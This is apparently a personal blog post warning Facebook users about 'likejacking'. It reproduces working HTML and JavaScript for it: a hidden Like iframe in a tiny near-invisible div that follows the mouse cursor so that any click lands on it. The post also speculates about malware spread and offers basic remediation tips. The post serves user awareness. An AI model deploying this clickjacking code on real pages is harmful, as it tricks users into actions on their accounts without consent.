Many of my friends including myself have a facebook account. I am sure there will be a few that remain with the saying or sentiment of “who would want to do that to me?” or “that won’t happen to me”. Well today, I will present to you something I stumbled upon. Some background I surf the website digital point to see what’s on the market as far as business or just curiosity, and I ran into a thread “Facebook AUTO LIKE and POST to wall!!!” My first thought was “WOW this is fool proof for someone trying to get exposure to their website!” All they need is a high amount of pop-up traffic and something to lure users to click on it. However after a few moments of thinking of it, the danger and risk set in. How can this be abused? Say you are not trying to promote a product, but instead are trying to push out malware? How can you have an influence on say 50 or even 200+ users seeing this? In this short article I am going to outline how this works, and explain how more or less this could be misused.
For you non-tech savvy users, you can skip to the reccomendations / remediation portion. For those of you fellow geeks here this how this works;
<!--facebook like frame code goes here-->
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.mangawhat.com&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
<!--end facebook like frame code-->
The above code shows one of my URL’s. So in the examples following this, I will not lead you to a domain that I believe to be unsafe. Basically this is the iframe that facebook provides webmasters to put on their website(s) so that a user may like it. In normal practice there is nothing wrong with this.
What has been done to this is, it was put into a div, with the id “icontainer” and been given these properties:
<div style="overflow-x: hidden; overflow-y: hidden; width: 10px; height: 12px; position: absolute; opacity: 50; top: 363px; left: 584px; " id="icontainer">
</div>
The importance of the above code is broken down as; any overflow is hidden, the width and height is 10×12 (pretty small), it is set to invisible so the user can’t even see it.
<script type="text/javascript">var interval;
$(function()
{
interval=setInterval("updateActiveElement();", 50);
});
function updateActiveElement()
{
if ( $(document.activeElement).attr('id')=="fbframe" )
{
clearInterval(interval);
iflag=1;
}
}
</script>
and
<script>
var iflag = 0;
var icontainer = document.getElementById('icontainer');
var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
function mouseFollower(e){
/* DO NOT EDIT THIS */
if (window.event)
{ // for IE
icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
}
else
{
icontainer.style.top = (e.pageY-5)+'px';
icontainer.style.left = (e.pageX-5)+'px';
}
}
document.onmousemove = function(e) {
if (iflag == 0) {mouseFollower(e);}
}
</script>
I am no javascript guru, but based on the source it is powered off of those two and jQuery used by many webmasters. I am sure someone in the comments will correct me if I am wrong on this one; the javascript is basically something designed to follow the mouse, “icontainer” as mentioned earlier is the element that contains the “div” to the code that the potentially malicious user wants you to click on.
Recommendations / Remediation:
I have no official recommendation with regards to fixing this. Sign out of your facebook when your done, or when you wont be at your desk for a while if others are using that machine as well. As an alternative sign in with a different browser. Such as use IE for facebook and Firefox to browse.
Possible Misuse:
Could this be misused? I have no doubt, lets throw in a hypothetical siuation. Say you have a facebook with 400 friends, you post this inadvertently, 40 users see it, and only 15 click on it, this is like the snowball effect because more and more users will see it. It could potentially be used to push out malware if used this way or to simply promote some website. I have seen other methods like this used, however have not seen this type of thing for sale until today. Could this be used for something other than posting stuff to my wall? I would not rule that out.
Example in action:
This example shown will not make you “like” or post anything offensive on your facebook, once you are done, remove the post from your wall if you would like. Click here for the example.
!